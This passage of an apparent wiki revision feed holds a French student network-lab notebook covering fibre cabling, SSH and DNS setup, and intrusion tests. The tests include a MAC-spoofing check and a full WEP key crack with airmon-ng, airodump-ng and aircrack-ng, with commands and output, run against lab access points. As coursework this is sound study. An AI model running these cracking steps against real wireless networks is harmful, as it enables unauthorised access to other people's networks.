mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34958</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34958"/>
				<updated>2016-11-07T10:38:47Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier named.conf.local pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers db.jjlddelamuerto.space et db.57.48.193.in-addr.arpa :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34957</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=34957"/>
				<updated>2016-11-07T10:38:14Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Travail commun */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
